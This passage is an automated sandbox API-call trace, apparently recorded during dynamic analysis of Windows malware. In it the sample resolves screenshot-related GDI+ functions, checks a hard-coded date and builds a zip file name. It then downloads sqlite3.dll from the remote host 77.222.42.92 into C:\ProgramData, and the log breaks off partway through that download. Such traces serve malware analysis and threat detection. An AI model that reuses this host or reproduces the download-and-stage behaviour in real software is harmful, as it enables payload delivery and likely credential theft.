0x75ea0290 [0193.531] GetProcAddress (hModule=0x6abd0000, lpProcName="GdipGetImageEncodersSize") returned 0x6ac2f520 [0193.531] GetProcAddress (hModule=0x6abd0000, lpProcName="GdipGetImageEncoders") returned 0x6ac2f380 [0193.531] GetProcAddress (hModule=0x6abd0000, lpProcName="GdipCreateBitmapFromHBITMAP") returned 0x6ac15b70 [0193.531] GetProcAddress (hModule=0x6abd0000, lpProcName="GdiplusStartup") returned 0x6ac3ab50 [0193.531] GetProcAddress (hModule=0x6abd0000, lpProcName="GdiplusShutdown") returned 0x6ac3a7c0 [0193.531] GetProcAddress (hModule=0x6abd0000, lpProcName="GdipSaveImageToStream") returned 0x6ac34bd0 [0193.532] GetProcAddress (hModule=0x6abd0000, lpProcName="GdipDisposeImage") returned 0x6ac391c0 [0193.532] GetProcAddress (hModule=0x6abd0000, lpProcName="GdipFree") returned 0x6ac13810 [0193.532] GetProcAddress (hModule=0x75360000, lpProcName="CreateStreamOnHGlobal") returned 0x744b1370 [0193.532] GetProcAddress (hModule=0x75360000, lpProcName="GetHGlobalFromStream") returned 0x744b1a60 [0193.553] GetSystemTime (in: lpSystemTime=0x19fe50 | out: lpSystemTime=0x19fe50*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x1, wDay=0xd, wHour=0xe, wMinute=0x6, wSecond=0x2b, wMilliseconds=0x194)) [0193.553] lstrcatA (in: lpString1="", lpString2="24/09/2021 00:00:00" | out: lpString1="24/09/2021 00:00:00") returned="24/09/2021 00:00:00" [0193.553] SystemTimeToFileTime (in: lpSystemTime=0x19fe50, lpFileTime=0x19ff68 | out: lpFileTime=0x19ff68) returned 1 [0193.554] SystemTimeToFileTime (in: lpSystemTime=0x19fe40, lpFileTime=0x19ff70 | out: lpFileTime=0x19ff70) returned 1 [0193.555] GetProcessHeap () returned 0x5b0000 [0193.555] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4098) returned 0x5e87c8 [0193.556] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6400000, lpName=0x0) returned 0x194 [0193.557] MapViewOfFile (hFileMappingObject=0x194, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6400000) returned 0x1ed0000 [0193.563] GetProcessHeap () returned 0x5b0000 [0193.563] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x8) returned 0x5d0ac0 [0193.563] GetSystemTime (in: lpSystemTime=0x19d528 | out: lpSystemTime=0x19d528*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x1, wDay=0xd, wHour=0xe, wMinute=0x6, wSecond=0x2b, wMilliseconds=0x19e)) [0193.563] lstrcatA (in: lpString1="", lpString2="0R1N7QQI" | out: lpString1="0R1N7QQI") returned="0R1N7QQI" [0193.563] lstrcatA (in: lpString1="0R1N7QQI", lpString2=".zip" | out: lpString1="0R1N7QQI.zip") returned="0R1N7QQI.zip" [0193.563] lstrcatA (in: lpString1="", lpString2="http://" | out: lpString1="http://") returned="http://" [0193.563] lstrcatA (in: lpString1="http://", lpString2="77.222.42.92" | out: lpString1="http://77.222.42.92") returned="http://77.222.42.92" [0193.563] lstrcatA (in: lpString1="http://77.222.42.92", lpString2="/public/sqlite3.dll" | out: lpString1="http://77.222.42.92/public/sqlite3.dll") returned="http://77.222.42.92/public/sqlite3.dll" [0193.597] InternetOpenA (lpszAgent="", dwAccessType=0x1, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0197.184] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://77.222.42.92/public/sqlite3.dll", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x100, dwContext=0x0) returned 0xcc000c [0206.445] CreateFileA (lpFileName="C:\\ProgramData\\sqlite3.dll" (normalized: "c:\\programdata\\sqlite3.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0206.446] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.447] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.448] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.449] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.449] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.449] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.449] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.449] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.449] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.449] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.450] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.450] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.450] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.450] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.450] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.450] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.450] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.451] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.451] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.451] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.451] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.451] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.451] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.451] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.451] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.452] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.452] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.460] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.460] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.460] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.461] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.461] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.461] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.461] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.462] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.462] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.462] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.463] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.463] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.463] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.463] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.463] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.464] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.464] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.464] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.465] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.465] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.465] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.465] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.466] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.466] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.466] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.467] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.467] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.467] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.467] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.468] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.468] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.468] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.468] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.469] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.469] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.469] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.469] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.470] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.470] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.470] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.470] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.471] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.471] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.471] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.471] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.471] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.472] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.472] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.473] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.473] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.473] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.473] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.474] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.474] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.564] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.564] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.564] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.564] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.565] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.565] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.565] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.565] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, 